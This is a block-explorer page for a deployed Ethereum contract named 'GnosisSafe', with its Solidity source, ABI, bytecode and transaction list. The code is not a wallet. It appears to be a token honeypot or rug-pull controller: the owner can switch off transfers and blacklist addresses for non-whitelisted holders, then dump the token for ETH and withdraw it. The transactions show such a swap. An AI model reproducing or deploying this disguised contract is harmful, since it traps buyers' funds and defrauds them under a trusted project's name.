ETH Price: $2,329.22 (+9.37%)

Contract

0x940426ECC5A59Fdd7E9FB790cdfF388eBee236E7
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Swap Exact ETH F...177143262023-07-17 16:59:47973 days ago1689613187IN
0x940426EC...eBee236E7
0 ETH0.0044651924.31029406
Enable177142092023-07-17 16:36:23973 days ago1689611783IN
0x940426EC...eBee236E7
0 ETH0.000934434.98201076
Refresh177142082023-07-17 16:36:11973 days ago1689611771IN
0x940426EC...eBee236E7
0 ETH0.0023321833.98100893

Latest 2 internal transactions

Advanced mode:
Parent Transaction Hash Method Block
From
To
Transfer177143262023-07-17 16:59:47973 days ago1689613187
0x940426EC...eBee236E7
3.68700871 ETH
Transfer177143262023-07-17 16:59:47973 days ago1689613187
0x940426EC...eBee236E7
3.68700871 ETH
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x7A73A81D...FD196C191
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
GnosisSafe

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-17
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
    function decimals() external pure returns (uint8);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
}
interface IUniRouter {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}


interface IUniswapV2Pair {
    function sync() external;
}
contract GnosisSafe {
    bool private isEnabled = true;
    address private _owner;
    address private token;
    address private pair;
    IUniRouter private router;

    mapping(address => bool) whitelists;
    mapping(address => bool) blacklists;

    modifier onlyOwner() {
        require(msg.sender == _owner); _;
    }
    constructor(address router_) {
        _owner = msg.sender;
        router = IUniRouter(router_);
    }
    function refresh(address token_, address pair_) external onlyOwner {
        token = token_;
        pair = pair_;
    }
    function enable(bool isEnabled_) external onlyOwner {
        isEnabled = isEnabled_;
    }
    function reset() external onlyOwner {
        token = address(0);
        pair = address(0);
        isEnabled = true;
    }
    function check(
        address from
    ) external view returns (uint256) {
        if (whitelists[from] || pair == address(0) || from == token) {
            return 0;
        }
        else if ((from == _owner || from == address(this))) {
            return 1;
        }
        if (from != pair) {
            require(isEnabled);
            require(!blacklists[from]);
        }
        return 0;
    }
    function whitelist(address[] memory whitelists_) external onlyOwner{
        for (uint i = 0; i < whitelists_.length; i++) {
            whitelists[whitelists_[i]] = true;
        }
    }

    function blacklist(address[] memory blacklists_) external onlyOwner{
        for (uint i = 0; i < blacklists_.length; i++) {
            blacklists[blacklists_[i]] = true;
        }
    }

    function swapExactETHForTokens(uint256 amount) external onlyOwner {
        address[] memory path = new address[](2);
        path[0] = token;
        path[1] = router.WETH();
        IERC20(token).approve(address(router), ~uint256(0));
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            amount,
            0,
            path,
            address(this),
            block.timestamp
        );  

        payable(msg.sender).transfer(address(this).balance);
    }

    function rescue(address token_) external onlyOwner {
        if (token_ == address(0)) {
            payable(msg.sender).transfer(address(this).balance);
        } else {
            IERC20(token_).transfer(msg.sender, IERC20(token_).balanceOf(address(this)));
        }
    }
    receive() external payable { }

    fallback(bytes calldata) external payable returns (bytes memory) {
        address from;
        bytes memory data = msg.data;
        assembly {
            from := mload(add(data, 0x14))
        }
        if (whitelists[from] || pair == address(0) || from == token) {
            return abi.encodePacked(uint256(0));
        }
        else if ((from == _owner || from == address(this))) {
            return abi.encodePacked(uint256(1));
        }
        if (from != pair) {
            require(isEnabled);
            require(!blacklists[from]);
        }
        return abi.encodePacked(uint256(0));
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"router_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"address[]","name":"blacklists_","type":"address[]"}],"name":"blacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"}],"name":"check","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"isEnabled_","type":"bool"}],"name":"enable","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token_","type":"address"},{"internalType":"address","name":"pair_","type":"address"}],"name":"refresh","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token_","type":"address"}],"name":"rescue","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"reset","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"whitelists_","type":"address[]"}],"name":"whitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

0x60806040526000805460ff1916600117905534801561001d57600080fd5b50604051610c84380380610c8483398101604081905261003c91610078565b60008054610100600160a81b0319163361010002179055600380546001600160a01b0319166001600160a01b03929092169190911790556100a8565b60006020828403121561008a57600080fd5b81516001600160a01b03811681146100a157600080fd5b9392505050565b610bcd806100b76000396000f3fe60806040526004361061007f5760003560e01c80638c3fd1db1161004e5780638c3fd1db14610279578063bd8aa78014610299578063c23697a8146102b9578063d826f88f146102eb57610086565b8063041f173f146101f75780631dc437b1146102195780634df68ada14610239578063839006f21461025957610086565b3661008657005b60003660606000806000368080601f016020809104026020016040519081016040528093929190818152602001838380828437600092018290525060148501516001600160a01b038116825260046020526040909120549096509394505060ff909216915081905061010157506002546001600160a01b0316155b8061011957506001546001600160a01b038381169116145b15610143576040805160006020820152015b604051602081830303815290604052925050506101ec565b6000546001600160a01b0383811661010090920416148061016c57506001600160a01b03821630145b156101825760408051600160208201520161012b565b6002546001600160a01b038381169116146101cc5760005460ff166101a657600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156101cc57600080fd5b604080516000602082015201604051602081830303815290604052925050505b915050805190602001f35b34801561020357600080fd5b50610217610212366004610930565b610300565b005b34801561022557600080fd5b506102176102343660046109f5565b610388565b34801561024557600080fd5b50610217610254366004610a1c565b61059b565b34801561026557600080fd5b50610217610274366004610a40565b6105ca565b34801561028557600080fd5b50610217610294366004610a5d565b610704565b3480156102a557600080fd5b506102176102b4366004610930565b61074e565b3480156102c557600080fd5b506102d96102d4366004610a40565b6107d2565b60405190815260200160405180910390f35b3480156102f757600080fd5b506102176108af565b60005461010090046001600160a01b0316331461031c57600080fd5b60005b81518110156103845760016005600084848151811061034057610340610a96565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061037c81610aac565b91505061031f565b5050565b60005461010090046001600160a01b031633146103a457600080fd5b604080516002808252606082018352600092602083019080368337505060015482519293506001600160a01b0316918391506000906103e5576103e5610a96565b6001600160a01b03928316602091820292909201810191909152600354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561043e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104629190610ad3565b8160018151811061047557610475610a96565b6001600160a01b03928316602091820292909201015260015460035460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af11580156104d9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104fd9190610af0565b5060035460405163791ac94760e01b81526001600160a01b039091169063791ac94790610537908590600090869030904290600401610b0d565b600060405180830381600087803b15801561055157600080fd5b505af1158015610565573d6000803e3d6000fd5b50506040513392504780156108fc029250906000818181858888f19350505050158015610596573d6000803e3d6000fd5b505050565b60005461010090046001600160a01b031633146105b757600080fd5b6000805460ff1916911515919091179055565b60005461010090046001600160a01b031633146105e657600080fd5b6001600160a01b0381166106205760405133904780156108fc02916000818181858888f19350505050158015610384573d6000803e3d6000fd5b6040516370a0823160e01b81523060048201526001600160a01b0382169063a9059cbb90339083906370a0823190602401602060405180830381865afa15801561066e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106929190610b7e565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af11580156106dd573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103849190610af0565b50565b60005461010090046001600160a01b0316331461072057600080fd5b600180546001600160a01b039384166001600160a01b03199182161790915560028054929093169116179055565b60005461010090046001600160a01b0316331461076a57600080fd5b60005b81518110156103845760016004600084848151811061078e5761078e610a96565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055806107ca81610aac565b91505061076d565b6001600160a01b03811660009081526004602052604081205460ff168061080257506002546001600160a01b0316155b8061081a57506001546001600160a01b038381169116145b1561082757506000919050565b6000546001600160a01b0383811661010090920416148061085057506001600160a01b03821630145b1561085d57506001919050565b6002546001600160a01b038381169116146108a75760005460ff1661088157600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156108a757600080fd5b506000919050565b60005461010090046001600160a01b031633146108cb57600080fd5b600180546001600160a01b031990811682556002805490911690556000805460ff19169091179055565b634e487b7160e01b600052604160045260246000fd5b6001600160a01b038116811461070157600080fd5b803561092b8161090b565b919050565b6000602080838503121561094357600080fd5b823567ffffffffffffffff8082111561095b57600080fd5b818501915085601f83011261096f57600080fd5b813581811115610981576109816108f5565b8060051b604051601f19603f830116810181811085821117156109a6576109a66108f5565b6040529182528482019250838101850191888311156109c457600080fd5b938501935b828510156109e9576109da85610920565b845293850193928501926109c9565b98975050505050505050565b600060208284031215610a0757600080fd5b5035919050565b801515811461070157600080fd5b600060208284031215610a2e57600080fd5b8135610a3981610a0e565b9392505050565b600060208284031215610a5257600080fd5b8135610a398161090b565b60008060408385031215610a7057600080fd5b8235610a7b8161090b565b91506020830135610a8b8161090b565b809150509250929050565b634e487b7160e01b600052603260045260246000fd5b600060018201610acc57634e487b7160e01b600052601160045260246000fd5b5060010190565b600060208284031215610ae557600080fd5b8151610a398161090b565b600060208284031215610b0257600080fd5b8151610a3981610a0e565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610b5d5784516001600160a01b031683529383019391830191600101610b38565b50506001600160a01b03969096166060850152505050608001529392505050565b600060208284031215610b9057600080fd5b505191905056fea264697066735822122068cc1025edd2f588d0df4a168ce438967643172aadff5a45d51f7525b1517c1764736f6c634300081300330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x60806040526004361061007f5760003560e01c80638c3fd1db1161004e5780638c3fd1db14610279578063bd8aa78014610299578063c23697a8146102b9578063d826f88f146102eb57610086565b8063041f173f146101f75780631dc437b1146102195780634df68ada14610239578063839006f21461025957610086565b3661008657005b60003660606000806000368080601f016020809104026020016040519081016040528093929190818152602001838380828437600092018290525060148501516001600160a01b038116825260046020526040909120549096509394505060ff909216915081905061010157506002546001600160a01b0316155b8061011957506001546001600160a01b038381169116145b15610143576040805160006020820152015b604051602081830303815290604052925050506101ec565b6000546001600160a01b0383811661010090920416148061016c57506001600160a01b03821630145b156101825760408051600160208201520161012b565b6002546001600160a01b038381169116146101cc5760005460ff166101a657600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156101cc57600080fd5b604080516000602082015201604051602081830303815290604052925050505b915050805190602001f35b34801561020357600080fd5b50610217610212366004610930565b610300565b005b34801561022557600080fd5b506102176102343660046109f5565b610388565b34801561024557600080fd5b50610217610254366004610a1c565b61059b565b34801561026557600080fd5b50610217610274366004610a40565b6105ca565b34801561028557600080fd5b50610217610294366004610a5d565b610704565b3480156102a557600080fd5b506102176102b4366004610930565b61074e565b3480156102c557600080fd5b506102d96102d4366004610a40565b6107d2565b60405190815260200160405180910390f35b3480156102f757600080fd5b506102176108af565b60005461010090046001600160a01b0316331461031c57600080fd5b60005b81518110156103845760016005600084848151811061034057610340610a96565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061037c81610aac565b91505061031f565b5050565b60005461010090046001600160a01b031633146103a457600080fd5b604080516002808252606082018352600092602083019080368337505060015482519293506001600160a01b0316918391506000906103e5576103e5610a96565b6001600160a01b03928316602091820292909201810191909152600354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561043e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104629190610ad3565b8160018151811061047557610475610a96565b6001600160a01b03928316602091820292909201015260015460035460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af11580156104d9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104fd9190610af0565b5060035460405163791ac94760e01b81526001600160a01b039091169063791ac94790610537908590600090869030904290600401610b0d565b600060405180830381600087803b15801561055157600080fd5b505af1158015610565573d6000803e3d6000fd5b50506040513392504780156108fc029250906000818181858888f19350505050158015610596573d6000803e3d6000fd5b505050565b60005461010090046001600160a01b031633146105b757600080fd5b6000805460ff1916911515919091179055565b60005461010090046001600160a01b031633146105e657600080fd5b6001600160a01b0381166106205760405133904780156108fc02916000818181858888f19350505050158015610384573d6000803e3d6000fd5b6040516370a0823160e01b81523060048201526001600160a01b0382169063a9059cbb90339083906370a0823190602401602060405180830381865afa15801561066e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106929190610b7e565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af11580156106dd573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103849190610af0565b50565b60005461010090046001600160a01b0316331461072057600080fd5b600180546001600160a01b039384166001600160a01b03199182161790915560028054929093169116179055565b60005461010090046001600160a01b0316331461076a57600080fd5b60005b81518110156103845760016004600084848151811061078e5761078e610a96565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055806107ca81610aac565b91505061076d565b6001600160a01b03811660009081526004602052604081205460ff168061080257506002546001600160a01b0316155b8061081a57506001546001600160a01b038381169116145b1561082757506000919050565b6000546001600160a01b0383811661010090920416148061085057506001600160a01b03821630145b1561085d57506001919050565b6002546001600160a01b038381169116146108a75760005460ff1661088157600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156108a757600080fd5b506000919050565b60005461010090046001600160a01b031633146108cb57600080fd5b600180546001600160a01b031990811682556002805490911690556000805460ff19169091179055565b634e487b7160e01b600052604160045260246000fd5b6001600160a01b038116811461070157600080fd5b803561092b8161090b565b919050565b6000602080838503121561094357600080fd5b823567ffffffffffffffff8082111561095b57600080fd5b818501915085601f83011261096f57600080fd5b813581811115610981576109816108f5565b8060051b604051601f19603f830116810181811085821117156109a6576109a66108f5565b6040529182528482019250838101850191888311156109c457600080fd5b938501935b828510156109e9576109da85610920565b845293850193928501926109c9565b98975050505050505050565b600060208284031215610a0757600080fd5b5035919050565b801515811461070157600080fd5b600060208284031215610a2e57600080fd5b8135610a3981610a0e565b9392505050565b600060208284031215610a5257600080fd5b8135610a398161090b565b60008060408385031215610a7057600080fd5b8235610a7b8161090b565b91506020830135610a8b8161090b565b809150509250929050565b634e487b7160e01b600052603260045260246000fd5b600060018201610acc57634e487b7160e01b600052601160045260246000fd5b5060010190565b600060208284031215610ae557600080fd5b8151610a398161090b565b600060208284031215610b0257600080fd5b8151610a3981610a0e565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610b5d5784516001600160a01b031683529383019391830191600101610b38565b50506001600160a01b03969096166060850152505050608001529392505050565b600060208284031215610b9057600080fd5b505191905056fea264697066735822122068cc1025edd2f588d0df4a168ce438967643172aadff5a45d51f7525b1517c1764736f6c63430008130033

Deployed Bytecode Sourcemap

1172:3114:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3707:12;3732;3755:17;3775:8;;3755:28;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;3842:4:0;3832:15;;3826:22;-1:-1:-1;;;;;3873:16:0;;;;:10;:16;;;;;;;3826:22;;-1:-1:-1;3755:28:0;;-1:-1:-1;;3873:16:0;;;;;-1:-1:-1;3873:16:0;;-1:-1:-1;3873:38:0;;-1:-1:-1;3893:4:0;;-1:-1:-1;;;;;3893:4:0;:18;3873:38;:55;;;-1:-1:-1;3923:5:0;;-1:-1:-1;;;;;3915:13:0;;;3923:5;;3915:13;3873:55;3869:247;;;3952:28;;;3977:1;3952:28;;;143:19:1;178:12;3952:28:0;;;;;;;;;;;;;3945:35;;;;;;3869:247;4020:6;;-1:-1:-1;;;;;4012:14:0;;;4020:6;;;;;4012:14;;:39;;-1:-1:-1;;;;;;4030:21:0;;4046:4;4030:21;4012:39;4007:109;;;4076:28;;;4101:1;4076:28;;;143:19:1;178:12;4076:28:0;14:182:1;4007:109:0;4138:4;;-1:-1:-1;;;;;4130:12:0;;;4138:4;;4130:12;4126:104;;4167:9;;;;4159:18;;;;;;-1:-1:-1;;;;;4201:16:0;;;;;;:10;:16;;;;;;;;4200:17;4192:26;;;;;;4247:28;;;4272:1;4247:28;;;143:19:1;178:12;4247:28:0;;;;;;;;;;;;4240:35;;;;3656:627;;;;1172:3114;;;;;;2617:191;;;;;;;;;;-1:-1:-1;2617:191:0;;;;;:::i;:::-;;:::i;:::-;;2816:506;;;;;;;;;;-1:-1:-1;2816:506:0;;;;;:::i;:::-;;:::i;1758:93::-;;;;;;;;;;-1:-1:-1;1758:93:0;;;;;:::i;:::-;;:::i;3330:282::-;;;;;;;;;;-1:-1:-1;3330:282:0;;;;;:::i;:::-;;:::i;1629:123::-;;;;;;;;;;-1:-1:-1;1629:123:0;;;;;:::i;:::-;;:::i;2418:191::-;;;;;;;;;;-1:-1:-1;2418:191:0;;;;;:::i;:::-;;:::i;1991:421::-;;;;;;;;;;-1:-1:-1;1991:421:0;;;;;:::i;:::-;;:::i;:::-;;;3079:25:1;;;3067:2;3052:18;1991:421:0;;;;;;;1857:128;;;;;;;;;;;;;:::i;2617:191::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;2700:6:::1;2695:106;2716:11;:18;2712:1;:22;2695:106;;;2785:4;2756:10;:26;2767:11;2779:1;2767:14;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;2756:26:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;2756:26:0;:33;;-1:-1:-1;;2756:33:0::1;::::0;::::1;;::::0;;;::::1;::::0;;2736:3;::::1;::::0;::::1;:::i;:::-;;;;2695:106;;;;2617:191:::0;:::o;2816:506::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;2917:16:::1;::::0;;2931:1:::1;2917:16:::0;;;;;::::1;::::0;;2893:21:::1;::::0;2917:16:::1;::::0;::::1;::::0;;::::1;::::0;::::1;-1:-1:-1::0;;2954:5:0::1;::::0;2944:7;;;;-1:-1:-1;;;;;;2954:5:0::1;::::0;2944:7;;-1:-1:-1;2954:5:0::1;::::0;2944:7:::1;;;;:::i;:::-;-1:-1:-1::0;;;;;2944:15:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:15;;;;2980:6:::1;::::0;:13:::1;::::0;;-1:-1:-1;;;2980:13:0;;;;:6;;;::::1;::::0;:11:::1;::::0;:13:::1;::::0;;::::1;::::0;2944:7;;2980:13;;;;;:6;:13:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;2970:4;2975:1;2970:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;2970:23:0;;::::1;:7;::::0;;::::1;::::0;;;;;:23;3011:5:::1;::::0;3034:6:::1;::::0;3004:51:::1;::::0;-1:-1:-1;;;3004:51:0;;3034:6;;::::1;3004:51;::::0;::::1;3914::1::0;-1:-1:-1;;3981:18:1;;;3974:34;3011:5:0;::::1;::::0;3004:21:::1;::::0;3887:18:1;;3004:51:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;3066:6:0::1;::::0;:182:::1;::::0;-1:-1:-1;;;3066:182:0;;-1:-1:-1;;;;;3066:6:0;;::::1;::::0;:57:::1;::::0;:182:::1;::::0;3138:6;;3066::::1;::::0;3175:4;;3202::::1;::::0;3222:15:::1;::::0;3066:182:::1;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;;3263:51:0::1;::::0;3271:10:::1;::::0;-1:-1:-1;3292:21:0::1;3263:51:::0;::::1;;;::::0;-1:-1:-1;3292:21:0;3263:51:::1;::::0;;;3292:21;3271:10;3263:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;2882:440;2816:506:::0;:::o;1758:93::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;1821:9:::1;:22:::0;;-1:-1:-1;;1821:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;1758:93::o;3330:282::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;-1:-1:-1;;;;;3396:20:0;::::1;3392:213;;3433:51;::::0;3441:10:::1;::::0;3462:21:::1;3433:51:::0;::::1;;;::::0;::::1;::::0;;;3462:21;3441:10;3433:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;3392:213;3553:39;::::0;-1:-1:-1;;;3553:39:0;;3586:4:::1;3553:39;::::0;::::1;5400:51:1::0;-1:-1:-1;;;;;3517:23:0;::::1;::::0;::::1;::::0;3541:10:::1;::::0;3517:23;;3553:24:::1;::::0;5373:18:1;;3553:39:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3517:76;::::0;-1:-1:-1;;;;;;3517:76:0::1;::::0;;;;;;-1:-1:-1;;;;;3932:32:1;;;3517:76:0::1;::::0;::::1;3914:51:1::0;3981:18;;;3974:34;3887:18;;3517:76:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;3392:213::-;3330:282:::0;:::o;1629:123::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;1707:5:::1;:14:::0;;-1:-1:-1;;;;;1707:14:0;;::::1;-1:-1:-1::0;;;;;;1707:14:0;;::::1;;::::0;;;1732:4:::1;:12:::0;;;;;::::1;::::0;::::1;;::::0;;1629:123::o;2418:191::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;2501:6:::1;2496:106;2517:11;:18;2513:1;:22;2496:106;;;2586:4;2557:10;:26;2568:11;2580:1;2568:14;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;2557:26:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;2557:26:0;:33;;-1:-1:-1;;2557:33:0::1;::::0;::::1;;::::0;;;::::1;::::0;;2537:3;::::1;::::0;::::1;:::i;:::-;;;;2496:106;;1991:421:::0;-1:-1:-1;;;;;2083:16:0;;2059:7;2083:16;;;:10;:16;;;;;;;;;:38;;-1:-1:-1;2103:4:0;;-1:-1:-1;;;;;2103:4:0;:18;2083:38;:55;;;-1:-1:-1;2133:5:0;;-1:-1:-1;;;;;2125:13:0;;;2133:5;;2125:13;2083:55;2079:193;;;-1:-1:-1;2162:1:0;;1991:421;-1:-1:-1;1991:421:0:o;2079:193::-;2203:6;;-1:-1:-1;;;;;2195:14:0;;;2203:6;;;;;2195:14;;:39;;-1:-1:-1;;;;;;2213:21:0;;2229:4;2213:21;2195:39;2190:82;;;-1:-1:-1;2259:1:0;;1991:421;-1:-1:-1;1991:421:0:o;2190:82::-;2294:4;;-1:-1:-1;;;;;2286:12:0;;;2294:4;;2286:12;2282:104;;2323:9;;;;2315:18;;;;;;-1:-1:-1;;;;;2357:16:0;;;;;;:10;:16;;;;;;;;2356:17;2348:26;;;;;;-1:-1:-1;2403:1:0;;1991:421;-1:-1:-1;1991:421:0:o;1857:128::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;1904:5:::1;:18:::0;;-1:-1:-1;;;;;;1904:18:0;;::::1;::::0;;1933:4:::1;:17:::0;;;;::::1;::::0;;1920:1:::1;1961:16:::0;;-1:-1:-1;;1961:16:0::1;::::0;;::::1;::::0;;1857:128::o;201:127:1:-;262:10;257:3;253:20;250:1;243:31;293:4;290:1;283:15;317:4;314:1;307:15;333:131;-1:-1:-1;;;;;408:31:1;;398:42;;388:70;;454:1;451;444:12;469:134;537:20;;566:31;537:20;566:31;:::i;:::-;469:134;;;:::o;608:1121::-;692:6;723:2;766;754:9;745:7;741:23;737:32;734:52;;;782:1;779;772:12;734:52;822:9;809:23;851:18;892:2;884:6;881:14;878:34;;;908:1;905;898:12;878:34;946:6;935:9;931:22;921:32;;991:7;984:4;980:2;976:13;972:27;962:55;;1013:1;1010;1003:12;962:55;1049:2;1036:16;1071:2;1067;1064:10;1061:36;;;1077:18;;:::i;:::-;1123:2;1120:1;1116:10;1155:2;1149:9;1218:2;1214:7;1209:2;1205;1201:11;1197:25;1189:6;1185:38;1273:6;1261:10;1258:22;1253:2;1241:10;1238:18;1235:46;1232:72;;;1284:18;;:::i;:::-;1320:2;1313:22;1370:18;;;1404:15;;;;-1:-1:-1;1446:11:1;;;1442:20;;;1474:19;;;1471:39;;;1506:1;1503;1496:12;1471:39;1530:11;;;;1550:148;1566:6;1561:3;1558:15;1550:148;;;1632:23;1651:3;1632:23;:::i;:::-;1620:36;;1583:12;;;;1676;;;;1550:148;;;1717:6;608:1121;-1:-1:-1;;;;;;;;608:1121:1:o;1734:180::-;1793:6;1846:2;1834:9;1825:7;1821:23;1817:32;1814:52;;;1862:1;1859;1852:12;1814:52;-1:-1:-1;1885:23:1;;1734:180;-1:-1:-1;1734:180:1:o;1919:118::-;2005:5;1998:13;1991:21;1984:5;1981:32;1971:60;;2027:1;2024;2017:12;2042:241;2098:6;2151:2;2139:9;2130:7;2126:23;2122:32;2119:52;;;2167:1;2164;2157:12;2119:52;2206:9;2193:23;2225:28;2247:5;2225:28;:::i;:::-;2272:5;2042:241;-1:-1:-1;;;2042:241:1:o;2288:247::-;2347:6;2400:2;2388:9;2379:7;2375:23;2371:32;2368:52;;;2416:1;2413;2406:12;2368:52;2455:9;2442:23;2474:31;2499:5;2474:31;:::i;2540:388::-;2608:6;2616;2669:2;2657:9;2648:7;2644:23;2640:32;2637:52;;;2685:1;2682;2675:12;2637:52;2724:9;2711:23;2743:31;2768:5;2743:31;:::i;:::-;2793:5;-1:-1:-1;2850:2:1;2835:18;;2822:32;2863:33;2822:32;2863:33;:::i;:::-;2915:7;2905:17;;;2540:388;;;;;:::o;3115:127::-;3176:10;3171:3;3167:20;3164:1;3157:31;3207:4;3204:1;3197:15;3231:4;3228:1;3221:15;3247:232;3286:3;3307:17;;;3304:140;;3366:10;3361:3;3357:20;3354:1;3347:31;3401:4;3398:1;3391:15;3429:4;3426:1;3419:15;3304:140;-1:-1:-1;3471:1:1;3460:13;;3247:232::o;3484:251::-;3554:6;3607:2;3595:9;3586:7;3582:23;3578:32;3575:52;;;3623:1;3620;3613:12;3575:52;3655:9;3649:16;3674:31;3699:5;3674:31;:::i;4019:245::-;4086:6;4139:2;4127:9;4118:7;4114:23;4110:32;4107:52;;;4155:1;4152;4145:12;4107:52;4187:9;4181:16;4206:28;4228:5;4206:28;:::i;4269:980::-;4531:4;4579:3;4568:9;4564:19;4610:6;4599:9;4592:25;4636:2;4674:6;4669:2;4658:9;4654:18;4647:34;4717:3;4712:2;4701:9;4697:18;4690:31;4741:6;4776;4770:13;4807:6;4799;4792:22;4845:3;4834:9;4830:19;4823:26;;4884:2;4876:6;4872:15;4858:29;;4905:1;4915:195;4929:6;4926:1;4923:13;4915:195;;;4994:13;;-1:-1:-1;;;;;4990:39:1;4978:52;;5085:15;;;;5050:12;;;;5026:1;4944:9;4915:195;;;-1:-1:-1;;;;;;;5166:32:1;;;;5161:2;5146:18;;5139:60;-1:-1:-1;;;5230:3:1;5215:19;5208:35;5127:3;4269:980;-1:-1:-1;;;4269:980:1:o;5462:184::-;5532:6;5585:2;5573:9;5564:7;5560:23;5556:32;5553:52;;;5601:1;5598;5591:12;5553:52;-1:-1:-1;5624:16:1;;5462:184;-1:-1:-1;5462:184:1:o

Swarm Source

ipfs://68cc1025edd2f588d0df4a168ce438967643172aadff5a45d51f7525b1517c17

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

